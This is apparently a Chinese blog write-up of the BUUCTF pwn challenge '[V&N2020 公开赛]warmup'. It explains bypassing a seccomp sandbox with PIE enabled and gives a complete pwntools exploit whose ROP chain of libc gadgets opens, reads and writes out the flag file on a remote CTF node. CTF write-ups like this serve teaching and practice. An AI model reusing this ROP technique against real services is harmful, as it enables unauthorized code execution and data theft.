• BUUCTF--[V&N2020 公开赛]warmup


    一开始直接告诉你libc基址。

    沙盒,分析了一下,write的count不等于0x10就可以,0x30什么的都可以。

     

    嗯,还开了PIE

    很明显了,orw。 问题是开了PIE,b'flag\x00'不能写在BSS上了,同时也不能重复执行main。

    怎么办呢,细心的小伙伴会发现我们知道libc的基址,那可以写在libc的bss上面啊。

    这是第一段写入,不能溢出。

     

    这是第二段,如果你用gdb调试一下或看看汇编就可以发现,如果这个0x80写满会和上面的0x180连起来。那就很简单了,从libc里面找gadget就好了。

    以下是exp:

    1. from pwn import *
    2. context.arch='amd64'
    3. #io=process('./pwn')
    4. io=remote('node5.buuoj.cn',25603)
    5. libc=ELF('./libc-2.23.so')
    6. io.recvuntil(b'Here is my gift: ')
    7. libc_base=int(io.recv(14),16)-libc.sym['puts']
    8. print('libc_base:',hex(libc_base))
    9. libc.address=libc_base
    10. ope=libc.sym['open']
    11. read=libc.sym['read']
    12. puts=libc.sym['puts']
    13. write=libc.sym['write']
    14. rdi=libc_base+0x21102
    15. rsi=libc_base+0x202e8
    16. rdx=libc_base+0x1b92
    17. push_rsi=libc_base+0x34bcf
    18. bss=libc.bss()
    19. print('bss',hex(bss))
    20. io.recvuntil(b'Input something: ')
    21. payload=p64(0)+p64(rsi)+p64(bss)+p64(rdx)+p64(0x30)
    22. payload+=p64(read)+p64(rdi)+p64(bss)+p64(rsi)+p64(0)+p64(ope)
    23. payload+=p64(rdi)+p64(3)+p64(rsi)+p64(bss)+p64(rdx)+p64(0x30)+p64(read)
    24. payload+=p64(rdi)+p64(1)+p64(rsi)+p64(bss)+p64(rdx)+p64(0x30)+p64(write)
    25. io.send(payload)
    26. io.recvuntil(b"What's your name?")
    27. payload=b'a'*0x78+p64(rdi)
    28. io.send(payload)
    29. sleep(0.1)
    30. io.send(b'flag\x00')
    31. io.interactive()

    这里注意一点,open的第二个参数一定要特意写一下。

    以下是通义千问的解释:
     

    在不指定rsi的情况,open会直接将rsi里面的值作为flag值,而rsi里面有时候存着地址,是一个极大值,可能会引起一些意想不到的问题。例如这题中,执行rop的时候rsi存着的是buf的地址,是一个极大值,一开始我没有pop rsi为0,导致执行了好几遍都没法orw成功,加上了pop rsi 0才成功读出flag。 

     

     

  • 相关阅读:
    见证云力量|飞马网技术沙龙“云计算专场”圆满结束
    三数之和(python)
    西农大 C plus
    2022年2022年9月5日中软国际Linux-C开发一面
    快速开发微信小程序之一登录认证
    一次edu证书站的挖掘
    元宇宙之问:产业与资本为什么扎堆元宇宙
    技术分享 | app自动化测试(Android)--触屏操作自动化
    SM4 研究与实现
    [信息抽取]基于ERNIE3.0的多对多信息抽取算法:属性关系抽取
  • 原文地址:https://blog.csdn.net/A13837377363/article/details/139332539